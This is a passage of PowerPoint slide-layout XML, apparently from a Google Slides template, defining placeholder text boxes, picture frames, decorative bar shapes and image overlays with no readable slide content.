                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans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5" name="Google Shape;345;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552763" y="2516225"/>
            <a:ext cx="44568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46" name="Google Shape;346;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8730053" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Google Shape;347;p14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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60" name="Shape 360"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="362" name="Google Shape;362;p15"/>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363" name="Google Shape;363;p15"/>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364" name="Google Shape;364;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="365" name="Google Shape;365;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="366" name="Google Shape;366;p15"/>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5"/>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5"/>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5"/>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0" name="Google Shape;370;p15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="371" name="Google Shape;371;p15"/>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5"/>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5"/>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5"/>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5" name="Google Shape;375;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="376" name="Google Shape;376;p15"/>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5"/>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5"/>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5"/>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5"/>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1" name="Google Shape;381;p15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2578675"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="2578675"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="382" name="Google Shape;382;p15"/>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383" name="Google Shape;383;p15"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3557400" y="3100288"/>
            <a:ext cx="43602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85" name="Google Shape;385;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226400" y="1511313"/>
            <a:ext cx="6691200" cy="1478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86" name="Shape 386"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="388" name="Google Shape;388;p16"/>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389" name="Google Shape;389;p16"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-75050" y="2503675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="391" name="Google Shape;391;p16"/>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392" name="Google Shape;392;p16"/>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393" name="Google Shape;393;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7319840" y="4523368"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="394" name="Google Shape;394;p16"/>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6"/>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6"/>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6"/>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8" name="Google Shape;398;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1172390" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Google Shape;399;p16"/>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6"/>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6"/>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6"/>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3" name="Google Shape;403;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830925" y="1108475"/>
            <a:ext cx="2984100" cy="1810200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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404" name="Google Shape;404;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830925" y="2918725"/>
            <a:ext cx="2984100" cy="111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5" name="Google Shape;405;p16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121775" y="690300"/>
            <a:ext cx="4191300" cy="3762900"/>
          </a:xfrm>
          <a:prstGeom prst="snip1Rect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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06" name="Shape 406"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="407" name="Google Shape;407;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="408" name="Google Shape;408;p17"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="409" name="Google Shape;409;p17"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Google Shape;410;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159918" y="1409000"/>
            <a:ext cx="2915100" cy="1091100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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411" name="Google Shape;411;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159918" y="2500100"/>
            <a:ext cx="2915100" cy="109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2" name="Google Shape;412;p17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692575" y="1548400"/>
            <a:ext cx="3119700" cy="1851900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="414" name="Google Shape;414;p17"/>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415" name="Google Shape;415;p17"/>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416" name="Google Shape;416;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="417" name="Google Shape;417;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="418" name="Google Shape;418;p17"/>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7"/>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7"/>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7"/>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2" name="Google Shape;422;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="423" name="Google Shape;423;p17"/>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7"/>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7"/>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7"/>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27" name="Google Shape;427;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="428" name="Google Shape;428;p17"/>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7"/>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7"/>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7"/>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7"/>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33" name="Shape 433"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="5143499"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="5143499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="435" name="Google Shape;435;p18"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="4015901"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="436" name="Google Shape;436;p18"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="Google Shape;437;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828550" y="1521000"/>
            <a:ext cx="2630400" cy="1021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438" name="Google Shape;438;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828675" y="2542200"/>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39" name="Google Shape;439;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440;p18"/>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441" name="Google Shape;441;p18"/>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442" name="Google Shape;442;p18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="443" name="Google Shape;443;p18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="444" name="Google Shape;444;p18"/>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8"/>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8"/>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8"/>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8" name="Google Shape;448;p18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="449" name="Google Shape;449;p18"/>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8"/>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8"/>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8"/>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53" name="Google Shape;453;p18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1712389" y="897775"/>
